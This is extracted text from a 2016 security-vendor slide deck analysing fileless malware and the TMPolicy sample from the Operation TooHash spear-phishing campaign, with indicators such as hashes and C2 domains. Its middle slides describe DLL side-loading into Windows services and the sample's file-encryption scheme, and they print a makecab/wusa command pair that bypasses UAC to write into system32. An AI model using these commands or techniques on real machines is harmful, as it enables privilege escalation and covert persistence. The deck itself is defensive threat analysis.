© 2016 Verint systems inc. All rights reserved worldwide 9 • Invisible Attacks • VPN, AD, PtH, PtT • Invisible Network Traffic • Google Drive, Dropbox • Invisible Malware • Task schedule, Wmi , Powershell Low visibility of Cyber Threats © 2016 Verint systems inc. All rights reserved worldwide 10 • As seen from the script or fileless malware, they begin to increase dramatically. And the PowerShell can be embedded in a macro and then into a document file in various forms. • The leverage of PowerShell or wmi which both built-in in windows system are often used in post-exploitation activities so the fileless threats will be more and more. Fileless malware attacks © 2016 Verint systems inc. All rights reserved worldwide 11 • The following elegant PowerShell can achieve three things in one line: • Detect the architecture (check against the size of the IntPtr object type: x86 or x64bit). • Download binary from website. • Directly run the binary on the fly (use iex command). • Invoke-Expression(iex), Runs commands or expressions on the local computer. You can install the back door just in one PS line • The malicious program is Self-Signed. But hacker added it to the trusted root chain. So the victim will always verify this as valid signature. 12 Import Self-Signed Certificate to Bypass Sign Check • TMPolicy (2) .dll is pretending to be msisip.dll • F:\MyProject\msisip\Release\NvSmartMax.pdb • DLL entry points, and all exported APIs only do one thing • WinExec ("tmpolicy.dll", 0) • TMPolicy (1) .dll The original name is tmpolicy.dll • Actually TMPolicy (1) .dll is a PE file(tmpolicy.dll). Sample_NICT.rar Overview 15 TMPolicy Sample Overview • The malware will determine whether it’s in the 32-bit or 64-bit windows version and generate the different payload with dll to bypass the security check. • In Windows XP will drop srvlic.dll + fake file • In Windows 7 will drop msTracer.dll + fake file • Fake file is actually a real backdoor module and is usually dropped to : • C:\Documents and Settings\All Users\Application Data\Windows CE\ directory. • C2 Connections : • help.adobeservice.net:80;help.adobeservice.net:8080; • assist.adobeservice.net:443;assist.adobeservice.net:1863; 16 Running on x86 Windows XP • How C:\WINDOWS\system32\srvlic.dll be executed? 17 Running on x86 Windows XP • One of svchost.exe will load srvsvc.dll, and srvsvc.dll tries to load srvlic.dll when LoadLicensingLibrary () is called • C:\Windows\system32\srvlic.dll (Actually, this file does not exist in the system) • The fake srvlic.dll will be loaded by DLL side-loading / path hijacking tricks. • When srvlic.dll is loaded, it will try to read the file "fake" and decrypt as a module file. • The decrypted fake file will be copied to a new memory block, so the srvlic.dll can not be observed by the process explorer. 18 Dll file has been mapped to memory blocks 19 Dll file has been mapped to memory blocks 20 Running on x64 Windows 7(1/2) • Run TMPolicy.exe 1. Drop C:\ProgramData\temp0 file and move to C:\Users\\AppData\Local\Temp\msTracer.dll 2. Move C:\Users\\AppData\Local\Temp\msTracer.dll file to C:\Windows\system32 (theoretically can not be moved to this path, restricted by UAC) 3. When msTracer.dll is loaded, it will try to read the file "fake" and decrypt as a module file C:\ProgramData\Windows CE\fake 4. Create a batch file to eliminate all files 21 Running on x64 Windows 7(2/2) • SearchIndexer.exe is a Windows Service (WSearch), and it will try to load msfte.dll when loadTracerDLL is called, and if it fails, it will to try to load msTracer.dll. • SearchProtocolHost.exe also has the same vulnerability(Dll Side-loading). • When msTracer.dll is loaded, it will try to read the file "fake" and decrypt as a module file. 22 Bypass UAC on Windows 7(1/3) • But TMPolicy.exe can not move msTracer.dll to system32 because it is protected by UAC. • So, how to place files in system protected areas without triggering UAC? 23 https://github.com/hfiref0x/UACME Bypass UAC on Windows 7(2/3) • Bypass the UAC restrictions • makecab.exe /V1 "C:\Users\\AppData\Local\Temp\msTracer.dll" "C:\Users\\AppData\Local\Temp\msTracer.dll.msu“ • wusa.exe /quiet "C:\Users\\AppData\Local\Temp\\msTracer.dll.msu" /extract:C:\Windows\system32 24 Bypass UAC on Windows 7(3/3) • wusa.exe : Windows Update Standalone Installer • Wusa method, tweaked to work from Windows 7 up to 10th1 10136 25 Encryption/Decryption of fake(1/4) • Each running of TMPolicy.exe will generate different fake files, but after decryption , the contents are all the same. • Fake file content = 4Byte Secret Key + Encrypted Content • Secretkey is generated by rand () function. 26 Encryption/Decryption of fake(2/4) • Secret Key: First 4 Byte • Cipher = ENCRYPT(Plain, Secret_Key) • Plain = DECRYPT(Cipher, Secret_Key) • Reduced Sequence: 128 Bytes table 27 reduced_sequece = [ 0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60, 0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F, 0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0, 0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE, ] Encryption/Decryption of fake(3/4) 1. Calculate Chosen Sequence: 4 Bytes • chosen_sequence[ i ] = reduced_sequece[ secret_key[ i ] % 128] 2. Build First Secret Map: 256 Bytes • first_secret_map = [ 0, 1, 2, ... , 255 ] 3. Choice chosen_sequence[ 0 ] ~ chosen_sequence[ 4 ] • first_secret_map rearranged four times with chosen_sequence[0-4] • Build Second Secret Map: 256 Bytes • second_secret_map[ first_secret_map[ i ] ] = i 28 Encryption/Decryption of fake(4/4) • Encryption(substitution ), through the second_secret_map • encrypted_data [ i ] = second_secret_map[ original_data[ i ] ] • Decryption(substitution ), through the reversed_second_secret_map • reversed_second_secret_map[ second_secret_map[ i ] ] = i decrypted_data[ i ] = reversed_second_secret_map[ encrypted_data[ i ] ] 29 © 2016 Verint systems inc. All rights reserved worldwide 34 • 03/11/2014 G DATA SecurityLabs have discovered a spyware campaign. Operation TooHash is a targeted cyber attack on companies and organizations. The aim of the attack is to steal sensitive information from the targeted companies. Using a "spear-phishing" approach” • 2013~ 2014-01-06 • 8d263d5dae035e3d97047171e1cbf841 (102年尾牙、103年春酒精緻菜單.xls) • 7251073c67db6421049ee2baf4f31b62 (李辉简历.doc) • 2ec306ef507402037e9c1eeb81276152 (文件列表.xls) • 6b83319cf336179f2105999fe586242c (Wo.doc) • C2: • *.cnnic-micro.com , *.adobeservice.net, *.intarnetservice.com.,etc Operation TooHash (H2) © 2016 Verint systems inc. All rights reserved worldwide 35 • Hash Values • 650C58E995A471FA4BE6C49A32F7899B • 4DBD68D3741D46170D2585AAE4336B80 • IP Address • Domain Names • help.adobeservice.net • help.adobeservice.net • Network/Host Artifacts • En/Decode Algorithm, Strings • Connection Protocol, User-agent • Tools • TMPolicy.exe • TTPs • Spearphishing email • UAC bypass, wusa.exe • Deploy through Anti-Virus • Dll-Slde loading Indicator of New OperationTooHash © 2016 Verint systems inc. All rights reserved worldwide 41 Machine-readable threat intelligence Not able to generate IOCs able to generate IOCs Closed threat intelligence (organization) Automated & Orchestrated Cyber Intelligence 47 Comprehensive = Active + Passive Monitoring Multiple Dimensions= Network + EndPoint forensics + Files Analysis Automated Analysis= Intelligence-Oriented Analysis+ Machine Learning Visualization = Unified Investigation Platform